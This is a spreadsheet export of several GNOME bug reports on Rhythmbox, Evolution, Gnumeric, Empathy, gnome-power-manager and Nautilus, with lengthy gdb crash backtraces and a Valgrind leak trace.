rhythmbox fails to retrieve CD information from the web
Steps to reproduce:
1. Insert a CD
2. start up Rhythmbox
3. even though Sound-juicer is able to retrieve CD information for that CD rhythmbox fails to.
Actual results:
Expected results:
rhythmbox should get correct CD information if sound-juicer can.
Does this happen every time?
YES
Other information:
this bug actually depends on bug #390283.</t>
  </si>
  <si>
    <t>Irene.Huang</t>
  </si>
  <si>
    <t>EVOLUTION-214297</t>
  </si>
  <si>
    <t>Evo sometimes hangs during Storing folder 'home/shady/evolution/local/inbox' (...)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Blocker
Version: 16.100 +cvs.2001.11.01.08.57
Synopsis: Evo sometimes hangs during Storing folder 'home/shady/evolution/local/inbox' (...)
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Sometimes when I check my mail I see that evolution stays a lot of time
when doing the operation: Storing folder
'home/shady/evolution/local/inbox' (...)
I have to kill evolution and restart it.
</t>
  </si>
  <si>
    <t>andy80</t>
  </si>
  <si>
    <t>WEBSITE-78900</t>
  </si>
  <si>
    <t>www.gnome.org</t>
  </si>
  <si>
    <t>Software map should be able to send out announce emails</t>
  </si>
  <si>
    <t>When adding a new release should optionally be able to spam
gnome-announce-list and/or gnome2-release-team with a form letter
built from the ChangeLog and other info.</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-328581</t>
  </si>
  <si>
    <t>incorrect .desktop file (trivial patch attached)</t>
  </si>
  <si>
    <t>even if this line has just been modified to add GNOMEGTK as behdad (and the standard) wanted it it is still not 'standard compliant' :
desktop-file-validate would still say that the 'Categories:' line lacks an ending ''
-Categories=GNOMEGTKApplicationSystemMonitorX-Red-Hat-Base
+Categories=GNOMEGTKApplicationSystemMonitorX-Red-Hat-Base
please apply so that this horrible bug is fixed</t>
  </si>
  <si>
    <t>leroutier</t>
  </si>
  <si>
    <t>EVOLUTION-329583</t>
  </si>
  <si>
    <t>GW: Evolution crashed when enabling/disabling GW account</t>
  </si>
  <si>
    <t>Backtrace was generated from '/opt/gnome/bin/evolution'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.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Thread debugging using libthread_db enabled]
[New Thread -1232659824 (LWP 25248)]
[New Thread -1465316448 (LWP 25666)]
[New Thread -1453528160 (LWP 25258)]
[New Thread -1445135456 (LWP 25257)]
[New Thread -1436742752 (LWP 25256)]
[New Thread -1335997536 (LWP 25252)]
[New Thread -1327502432 (LWP 25251)]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0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb6b2bfdb in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0xb791a965 in gnome_init_with_popt_table () from /opt/gnome/lib/libgnomeui-2.so.0
#3  0x0805f4d9 in segv_redirect ()
#4  
#5  0xb7dd5ed8 in camel_store_summary_save () from /opt/gnome/lib/libcamel-provider-1.2.so.8
#6  0xa8a9e9de in camel_groupwise_store_finalize () from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelgroupwise.so
#7  0xb7d31102 in camel_object_unref () from /opt/gnome/lib/libcamel-1.2.so.0
#8  0xb11a399d in real_flush_updates () from /opt/gnome/lib/evolution/2.6/components/libevolution-mail.so
#9  0xb11a53a3 in do_async_event () from /opt/gnome/lib/evolution/2.6/components/libevolution-mail.so
#10 0xb11a7072 in idle_async_event () from /opt/gnome/lib/evolution/2.6/components/libevolution-mail.so
#11 0xb6a29381 in g_list_copy () from /opt/gnome/lib/libglib-2.0.so.0
#12 0xb6a2adbc in g_main_context_dispatch () from /opt/gnome/lib/libglib-2.0.so.0
#13 0xb6a2e086 in g_main_context_check () from /opt/gnome/lib/libglib-2.0.so.0
#14 0xb6a2e447 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#15 0xb749cc03 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#16 0x0805f94a in main ()
Thread 7 (Thread -1327502432 (LWP 25251)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb69964d3 in poll () from /lib/libc.so.6
No symbol table info available.
#2  0xb6a2e0b9 in g_main_context_check () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb6a2e447 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb6b39495 in libnm_glib_init () from /opt/gnome/lib/libnm_glib.so.0
No symbol table info available.
#5  0xb6a48e0f in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb6b253fb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0xb699f79e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 6 (Thread -1335997536 (LWP 25252)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6b285c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7a53201 in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7a53719 in thread_dispatch () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb6b253fb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb699f79e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 5 (Thread -1436742752 (LWP 25256)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6b285c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7a53201 in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7a53719 in thread_dispatch () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb6b253fb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb699f79e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 4 (Thread -1445135456 (LWP 25257)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6b285c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7a53201 in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7a53719 in thread_dispatch () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb6b253fb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb699f79e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 3 (Thread -1453528160 (LWP 25258)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6b285c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7a53201 in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7a53719 in thread_dispatch () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb6b253fb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb699f79e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread -1465316448 (LWP 25666)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6b285c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7a53201 in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7a53719 in thread_dispatch () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb6b253fb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb699f79e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread -1232659824 (LWP 25248)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6b2bfdb in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb791a965 in gnome_init_with_popt_table () from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#3  0x0805f4d9 in segv_redirect ()
No symbol table info available.
#4  
No symbol table info available.
#5  0xb7dd5ed8 in camel_store_summary_save () from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#6  0xa8a9e9de in camel_groupwise_store_finalize () from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelgroupwise.so
No symbol table info available.
#7  0xb7d31102 in camel_object_unref () from /opt/gnome/lib/libcamel-1.2.so.0
No symbol table info available.
#8  0xb11a399d in real_flush_updates () from /opt/gnome/lib/evolution/2.6/components/libevolution-mail.so
No symbol table info available.
#9  0xb11a53a3 in do_async_event () from /opt/gnome/lib/evolution/2.6/components/libevolution-mail.so
No symbol table info available.
#10 0xb11a7072 in idle_async_event () from /opt/gnome/lib/evolution/2.6/components/libevolution-mail.so
No symbol table info available.
#11 0xb6a29381 in g_list_copy () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#12 0xb6a2adbc in g_main_context_dispatch () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#13 0xb6a2e086 in g_main_context_check () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#14 0xb6a2e447 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#15 0xb749cc03 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#16 0x0805f94a in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>EMPATHY-459165</t>
  </si>
  <si>
    <t>Add contact title label should not be Contact but Add Contact</t>
  </si>
  <si>
    <t>And same for contact information: it should be Contact Information. Maybe I should open another bug? -)</t>
  </si>
  <si>
    <t>GNUMERIC-163223</t>
  </si>
  <si>
    <t>Rich text with explicit sizes does not zoom</t>
  </si>
  <si>
    <t>Please describe the problem:
While importing a MS Excel file I noticed some headings being incorrectly
displayed with different zoom settings (150% 50% etc.).
It seems to happen in cells with characters differently formatted (bold italic).
Steps to reproduce:
1. Make a file in Microsoft Excel type A B C in one cell and make B bold
2. Open in Gnumeric and change zoom (to 200% and 50% for example) 
3. 
Actual results:
Only the first character gets resized with zoom
Expected results:
I'd expect all text to be correctly resized
Does this happen every time?
yes
Other information:
no</t>
  </si>
  <si>
    <t>ari.constancio</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-373278</t>
  </si>
  <si>
    <t>crashed while screen was locked</t>
  </si>
  <si>
    <t>Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1208621376 (LWP 2647)]
0x00110402 in __kernel_vsyscall ()
#0  0x00110402 in __kernel_vsyscall ()
#1  0x00b5cc93 in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0x0086c67d in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:870
#3  
#4  0x0806717e in gpm_screensaver_auth_begin (proxy=0x8a500e0 
    screensaver=0x89f40e8) at gpm-screensaver.c:105
#5  0x007ba729 in IA__g_cclosure_marshal_VOID__VOID (closure=0x89f3af8 
    return_value=0x0 n_param_values=1 param_values=0x8b1d000 
    invocation_hint=0xbfac36cc marshal_data=0x80670c0) at gmarshal.c:77
#6  0x002a3366 in marshal_dbus_message_to_g_marshaller (closure=0x89f3af8 
    return_value=0x0 n_param_values=3 param_values=0xbfac37ec 
    invocation_hint=0xbfac36cc marshal_data=0x0) at dbus-gproxy.c:1613
#7  0x007ace0b in IA__g_closure_invoke (closure=0x89f3af8 return_value=0x0 
    n_param_values=3 param_values=0xbfac37ec invocation_hint=0xbfac36cc)
    at gclosure.c:490
#8  0x007be58b in signal_emit_unlocked_R (node=0x8997b18 detail=679 
    instance=0x8a500e0 emission_return=0x0 instance_and_params=0xbfac37ec)
    at gsignal.c:2440
#9  0x007bfa03 in IA__g_signal_emit_valist (instance=0x8a500e0 signal_id=40 
    detail=679 var_args=0xbfac3a34 ÃŒÂ¥\224) at gsignal.c:2199
#10 0x007bfca9 in IA__g_signal_emit (instance=0x8a500e0 signal_id=40 
    detail=679) at gsignal.c:2243
#11 0x002a420b in dbus_g_proxy_manager_filter (connection=0x897cb40 
    message=0x8b1e248 user_data=0x89e5940) at dbus-gproxy.c:1666
#12 0x008f2602 in dbus_connection_dispatch (connection=0x897cb40)
    at dbus-connection.c:3779
#13 0x0029bdbd in message_queue_dispatch (source=0x897c718 callback=0 
    user_data=0x0) at dbus-gmain.c:113
#14 0x00c53f72 in IA__g_main_context_dispatch (context=0x89708b8)
    at gmain.c:2045
#15 0x00c56f3f in g_main_context_iterate (context=0x89708b8 block=1 
    dispatch=1 self=0x8947240) at gmain.c:2677
#16 0x00c572e9 in IA__g_main_loop_run (loop=0x8a3e1b0) at gmain.c:2881
#17 0x080585f7 in main (argc=) at gpm-main.c:252
Thread 1 (Thread -1208621376 (LWP 2647)):
#0  0x00110402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00b5cc93 in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0x0086c67d in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:870
	estatus = -1079233460
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {144654572 1 126652704 8170084 8251100 3215733452 
      3215733160 8066921 16 1073741824 144231312 8251100 3215733452 2 
      3215733192 8056910 144654572 2 1 8158033 0 4 11891441 8171092 
      3215733452 2647 0 8057976 11895772 1 3215733240 1}} 
  sa_flags = 144654568 sa_restorer = 0x7de6dc}
	pid = 0
	in_segv = 1
#3  
No symbol table info available.
#4  0x0806717e in gpm_screensaver_auth_begin (proxy=0x8a500e0 
    screensaver=0x89f40e8) at gpm-screensaver.c:105
	error = (GError *) 0x0
	res = 
	__FUNCTION__ = gpm_screensaver_auth_begin
#5  0x007ba729 in IA__g_cclosure_marshal_VOID__VOID (closure=0x89f3af8 
    return_value=0x0 n_param_values=1 param_values=0x8b1d000 
    invocation_hint=0xbfac36cc marshal_data=0x80670c0) at gmarshal.c:77
	data1 = (gpointer) 0x8a500e0
	data2 = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__VOID
#6  0x002a3366 in marshal_dbus_message_to_g_marshaller (closure=0x89f3af8 
    return_value=0x0 n_param_values=3 param_values=0xbfac37ec 
    invocation_hint=0xbfac36cc marshal_data=0x0) at dbus-gproxy.c:1613
	value_array = (GValueArray *) 0x8b17a08
	c_marshaller = (
    GSignalCMarshaller) 0x804c42c 
	proxy = (DBusGProxy *) 0x8a500e0
	__PRETTY_FUNCTION__ = marshal_dbus_message_to_g_marshaller
#7  0x007ace0b in IA__g_closure_invoke (closure=0x89f3af8 return_value=0x0 
    n_param_values=3 param_values=0xbfac37ec invocation_hint=0xbfac36cc)
    at gclosure.c:490
	marshal = (
    GClosureMarshal) 0x2a31e0 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#8  0x007be58b in signal_emit_unlocked_R (node=0x8997b18 detail=679 
    instance=0x8a500e0 emission_return=0x0 instance_and_params=0xbfac37ec)
    at gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x89e74a0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x8a500e0 ihint = {
    signal_id = 40 detail = 679 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x0
	handler_list = (Handler *) 0x89e74a0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 40
	max_sequential_handler_number = 734
	return_value_altered = 0
#9  0x007bfa03 in IA__g_signal_emit_valist (instance=0x8a500e0 signal_id=40 
    detail=679 var_args=0xbfac3a34 ÃŒÂ¥\224) at gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 145865104 v_long = 145865104 
    v_int64 = 41780381144430992 v_double = 7.2746499214313636e-306 
    v_pointer = 0x8b1b990} {v_int = 9725794 v_long = 9725794 
    v_int64 = 41809178764011362 v_double = 7.3110733825940286e-306 
    v_pointer = 0x946762} {v_int = 11902357 v_long = 11902357 
    v_int64 = 10028731468193173 v_double = 5.4595556625881826e-308 
    v_pointer = 0xb59d95} {v_int = 20 v_long = 20 
    v_int64 = -4635266866351177708 v_double = -0.055124998092651506 
    v_pointer = 0x14} {v_int = 2329877 v_long = 2329877 
    v_int64 = 4297297173 v_double = 2.123146903150008e-314 
    v_pointer = 0x238d15} {v_int = 13341160 v_long = 13341160 
    v_int64 = -4635266591459929624 v_double = -0.055126905533857073 
    v_pointer = 0xcb91e8} {v_int = 9569231 v_long = 9569231 
    v_int64 = 618252021053653967 v_double = 2.4801210308938916e-267 
    v_pointer = 0x9203cf} {v_int = 64 v_long = 64 
    v_int64 = -4635266591473270720 v_double = -0.055126905441284624 
    v_pointer = 0x40}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 9741772 data = {{v_int = -1079232012 
      v_uint = 3215735284 v_long = -1079232012 v_ulong = 3215735284 
      v_int64 = 626366145194899956 v_uint64 = 626366145194899956 
      v_float = -1.34551859 v_double = 8.3829950220645423e-267 
      v_pointer = 0xbfac39f4} {v_int = -1079232040 v_uint = 3215735256 
      v_long = -1079232040 v_ulong = 3215735256 
      v_int64 = 40910043451505112 v_uint64 = 40910043451505112 
      v_float = -1.34551525 v_double = 6.1738397982815257e-306 
      v_pointer = 0xbfac39d8}}}
	error = 
	instance_and_params = (GValue *) 0xbfac37ec
	stack_values = {{g_type = 144155936 data = {{v_int = 145031392 
        v_uint = 145031392 v_long = 145031392 v_ulong = 145031392 
        v_int64 = 145031392 v_uint64 = 145031392 v_float = 9.93078199e-34 
        v_double = 7.1655028355734997e-316 v_pointer = 0x8a500e0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 144644040 data = {{v_int = 145875528 v_uint = 145875528 
        v_long = 145875528 v_ulong = 145875528 v_int64 = 145875528 
        v_uint64 = 145875528 v_float = 1.07059985e-33 
        v_double = 7.2072086953752844e-316 v_pointer = 0x8b1e248} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 68 data = {{v_int = 145837232 v_uint = 145837232 
        v_long = 145837232 v_ulong = 145837232 v_int64 = 145837232 
        v_uint64 = 145837232 v_float = 1.06708291e-33 
        v_double = 7.2053166215779707e-316 v_pointer = 0x8b14cb0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 3215735016 data = {{v_int = 9407023 v_uint = 9407023 
        v_long = 9407023 v_ulong = 9407023 v_int64 = 4304374319 
        v_uint64 = 4304374319 v_float = 1.31820469e-38 
        v_double = 2.1266434778592108e-314 v_pointer = 0x8f8a2f} {
        v_int = 9684028 v_uint = 9684028 v_long = 9684028 
        v_ulong = 9684028 v_int64 = 543969307538998332 
        v_uint64 = 543969307538998332 v_float = 1.35702136e-38 
        v_double = 2.6403506333412952e-272 v_pointer = 0x93c43c}}} {
    g_type = 125784033 data = {{v_int = 145875752 v_uint = 145875752 
        v_long = 145875752 v_ulong = 145875752 v_int64 = 528426853160 
        v_uint64 = 528426853160 v_float = 1.07062042e-33 
        v_double = 2.6107755448635295e-312 v_pointer = 0x8b1e328} {
        v_int = 36 v_uint = 36 v_long = 36 v_ulong = 36 
        v_int64 = 540249505073725476 v_uint64 = 540249505073725476 
        v_float = 5.04467447e-44 v_double = 1.4488602885339673e-272 
        v_pointer = 0x24}}} {g_type = 145875752 data = {{v_int = 132 
        v_uint = 132 v_long = 132 v_ulong = 132 v_int64 = 137438953604 
        v_uint64 = 137438953604 v_float = 1.84971397e-43 
        v_double = 6.7903865376105379e-313 v_pointer = 0x84} {
        v_int = 9569231 v_uint = 9569231 v_long = 9569231 
        v_ulong = 9569231 v_int64 = 171808261071 v_uint64 = 171808261071 
        v_float = 1.34093487e-38 v_double = 8.4884559466905112e-313 
        v_pointer = 0x9203cf}}} {g_type = 9740840 data = {{
        v_int = 126553400 v_uint = 126553400 v_long = 126553400 
        v_ulong = 126553400 v_int64 = 41241143686139192 
        v_uint64 = 41241143686139192 v_float = 2.09221648e-34 
        v_double = 6.5926180415139737e-306 v_pointer = 0x78b0d38} {
        v_int = 9741772 v_uint = 9741772 v_long = 9741772 
        v_ulong = 9741772 v_int64 = 41840592154830284 
        v_uint64 = 41840592154830284 v_float = 1.36511301e-38 
        v_double = 7.350805292284945e-306 v_pointer = 0x94a5cc}}} {
    g_type = 3215735096 data = {{v_int = 9569231 v_uint = 9569231 
        v_long = 9569231 v_ulong = 9569231 v_int64 = 4304536527 
        v_uint64 = 4304536527 v_float = 1.34093487e-38 
        v_double = 2.1267236192594914e-314 v_pointer = 0x9203cf} {
        v_int = 9741772 v_uint = 9741772 v_long = 9741772 
        v_ulong = 9741772 v_int64 = -4635267553536203316 
        v_uint64 = 13811476520173348300 v_float = 1.36511301e-38 
        v_double = -0.055120229788666458 v_pointer = 0x94a5cc}}} {
    g_type = 9579890 data = {{v_int = 40 v_uint = 40 v_long = 40 
        v_ulong = 40 v_int64 = 543969307529314344 
        v_uint64 = 543969307529314344 v_float = 5.60519386e-44 
        v_double = 2.6403506301614324e-272 v_pointer = 0x28} {
        v_int = 9725794 v_uint = 9725794 v_long = 9725794 
        v_ulong = 9725794 v_int64 = 846118283106 v_uint64 = 846118283106 
        v_float = 1.36287402e-38 v_double = 4.1803797600085257e-312 
        v_pointer = 0x946762}}} {g_type = 9727895 data = {{v_int = 9741772 
        v_uint = 9741772 v_long = 9741772 v_ulong = 9741772 
        v_int64 = 543950340963476940 v_uint64 = 543950340963476940 
        v_float = 1.36511301e-38 v_double = 2.6341227127635225e-272 
        v_pointer = 0x94a5cc} {v_int = 9569231 v_uint = 9569231 
        v_long = 9569231 v_ulong = 9569231 v_int64 = 626485851317208015 
        v_uint64 = 626485851317208015 v_float = 1.34093487e-38 
        v_double = 8.5890771932634783e-267 v_pointer = 0x9203cf}}} {
    g_type = 3215735040 data = {{v_int = 125789874 v_uint = 125789874 
        v_long = 125789874 v_ulong = 125789874 
        v_int64 = 543969221755758258 v_uint64 = 543969221755758258 
        v_float = 1.92142472e-34 v_double = 2.6403224653040297e-272 
        v_pointer = 0x77f66b2} {v_int = 145875752 v_uint = 145875752 
        v_long = 145875752 v_ulong = 145875752 
        v_int64 = 540249505219601192 v_uint64 = 540249505219601192 
        v_float = 1.07062042e-33 v_double = 1.4488603124840571e-272 
        v_pointer = 0x8b1e328}}} {g_type = 145868744 data = {{v_int = 132 
        v_uint = 132 v_long = 132 v_ulong = 132 v_int64 = 214748364932 
        v_uint64 = 214748364932 v_float = 1.84971397e-43 
        v_double = 1.0609978961348028e-312 v_pointer = 0x84} {
        v_int = 9741772 v_uint = 9741772 v_long = 9741772 
        v_ulong = 9741772 v_int64 = -4635266591463529012 
        v_uint64 = 13811477482246022604 v_float = 1.36511301e-38 
        v_double = -0.055126905508881302 v_pointer = 0x94a5cc}}} {
    g_type = 9407023 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 41592583553548289 
        v_uint64 = 41592583553548289 v_float = 1.40129846e-45 
        v_double = 7.0371220160825179e-306 v_pointer = 0x1} {
        v_int = 9683460 v_uint = 9683460 v_long = 9683460 
        v_ulong = 9683460 v_int64 = 992147128836 v_uint64 = 992147128836 
        v_float = 1.35694176e-38 v_double = 4.9018581197789678e-312 
        v_pointer = 0x93c204}}} {g_type = 9686767 data = {{
        v_int = 126648308 v_uint = 126648308 v_long = 126648308 
        v_ulong = 126648308 v_int64 = 626531584246054900 
        v_uint64 = 626531584246054900 v_float = 2.11400629e-34 
        v_double = 8.6678095178124125e-267 v_pointer = 0x78c7ff4} {
        v_int = 9683460 v_uint = 9683460 v_long = 9683460 
        v_ulong = 9683460 v_int64 = -4635266866341494268 
        v_uint64 = 13811477207368057348 v_float = 1.35694176e-38 
        v_double = -0.055124998159843869 v_pointer = 0x93c204}}} {
    g_type = 8 data = {{v_int = 145875532 v_uint = 145875532 
        v_long = 145875532 v_ulong = 145875532 
        v_int64 = 626485851453514316 v_uint64 = 626485851453514316 
        v_float = 1.07060021e-33 v_double = 8.5890774279239778e-267 
        v_pointer = 0x8b1e24c} {v_int = 64 v_uint = 64 v_long = 64 
        v_ulong = 64 v_int64 = 543950340953735232 
        v_uint64 = 543950340953735232 v_float = 8.96831017e-44 
        v_double = 2.6341227095647066e-272 v_pointer = 0x40}}} {g_type = 0 
    data = {{v_int = 32 v_uint = 32 v_long = 32 v_ulong = 32 
        v_int64 = 309237645344 v_uint64 = 309237645344 
        v_float = 4.48415509e-44 v_double = 1.5278369696530971e-312 
        v_pointer = 0x20} {v_int = 145875744 v_uint = 145875744 
        v_long = 145875744 v_ulong = 145875744 v_int64 = 171944567584 
        v_uint64 = 171944567584 v_float = 1.07061968e-33 
        v_double = 8.4951903832282825e-313 v_pointer = 0x8b1e320}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfac3800
	node = (SignalNode *) 0x8997b18
	i = 2
	n_params = 2
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#10 0x007bfca9 in IA__g_signal_emit (instance=0x8a500e0 signal_id=40 
    detail=679) at gsignal.c:2243
	var_args = 0xbfac3a2c HÃ¢Â±\bÂ°LÂ±\bÃŒÂ¥\224
#11 0x002a420b in dbus_g_proxy_manager_filter (connection=0x897cb40 
    message=0x8b1e248 user_data=0x89e5940) at dbus-gproxy.c:1666
	name = 0x94a5cc dÂ´\006
	prev_owner = 0x897cbc8 
	new_owner = 0x2a6fbd \203Ã„\004Â¸\001
	derr = {name = 0x94a5cc dÂ´\006 
  message = 0xbfac3ac8 \210Â¬Â¿\002&amp;\217 dummy1 = 0 dummy2 = 1 
  dummy3 = 0 dummy4 = 0 dummy5 = 0 padding1 = 0xbfac3aa8}
	manager = 
	__PRETTY_FUNCTION__ = dbus_g_proxy_manager_filter
#12 0x008f2602 in dbus_connection_dispatch (connection=0x897cb40)
    at dbus-connection.c:3779
	filter = (DBusMessageFilter *) 0x897a8a8
	next = (DBusList *) 0x0
	message = (DBusMessage *) 0x8b1e248
	link = 
	filter_list_copy = (DBusList *) 0x8a3e8d4
	message_link = (DBusList *) 0x8a3e9dc
	result = DBUS_HANDLER_RESULT_NOT_YET_HANDLED
	status = 
	__FUNCTION__ = dbus_connection_dispatch
#13 0x0029bdbd in message_queue_dispatch (source=0x897c718 callback=0 
    user_data=0x0) at dbus-gmain.c:113
	connection = (DBusConnection *) 0x897cb40
#14 0x00c53f72 in IA__g_main_context_dispatch (context=0x89708b8)
    at gmain.c:2045
No locals.
#15 0x00c56f3f in g_main_context_iterate (context=0x89708b8 block=1 
    dispatch=1 self=0x8947240) at gmain.c:2677
	got_ownership = 
	max_priority = 0
	timeout = 0
	some_ready = 1
	nfds = 
	allocated_nfds = 
	fds = (GPollFD *) 0x8a40ae0
	__PRETTY_FUNCTION__ = g_main_context_iterate
#16 0x00c572e9 in IA__g_main_loop_run (loop=0x8a3e1b0) at gmain.c:2881
	got_ownership = 11891424
	self = (GThread *) 0x8947240
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#17 0x080585f7 in main (argc=) at gpm-main.c:252
	loop = (GMainLoop *) 0x8a3e1b0
	master = 
	flags = 0
	session_connection = (DBusGConnection *) 0x897cb44
	verbose = 0
	no_daemon = 0
	timed_exit = 0
	manager = (GpmManager *) 0x89f3410
	error = (GError *) 0x0
	context = (GOptionContext *) 0x8947008
	program = (GnomeProgram *) 0x8950410
	debugoptions = (char **) 0x0
	options = {{long_name = 0x806fc7d no-daemon short_name = 0 '\0' 
    flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0xbfac3da0 
    description = 0x806fc87 Do not daemonize arg_description = 0x0} {
    long_name = 0x806fc98 verbose short_name = 0 '\0' flags = 0 
    arg = G_OPTION_ARG_NONE arg_data = 0xbfac3da4 
    description = 0x806fe2c Show extra debugging information 
    arg_description = 0x0} {long_name = 0x806fca0 timed-exit 
    short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0xbfac3d9c 
    description = 0x806fe50 Exit after a small delay (for debugging) 
    arg_description = 0x0} {long_name = 0x806fcab debug 
    short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_STRING_ARRAY 
    arg_data = 0xbfac3d94 
    description = 0x806fe7c Debug specific files e.g. power 
    arg_description = 0x0} {long_name = 0x0 short_name = 0 '\0' flags = 0 
    arg = G_OPTION_ARG_NONE arg_data = 0x0 description = 0x0 
    arg_description = 0x0}}
	__FUNCTION__ = main
#0  0x00110402 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>NAUTILUS-307288</t>
  </si>
  <si>
    <t>Leak in nautilus-icon-factory</t>
  </si>
  <si>
    <t>Valgrind reports this:
==8732== 5236 (52 direct 5184 indirect) bytes in 1 blocks are definitely lost
in loss record 17625 of 20645
==8732==    at 0x1B909B71: calloc (vg_replace_malloc.c:175)
==8732==    by 0x1C4E8FB7: g_malloc0 (gmem.c:154)
==8732==    by 0x1C4A40D0: g_type_create_instance (gtype.c:1576)
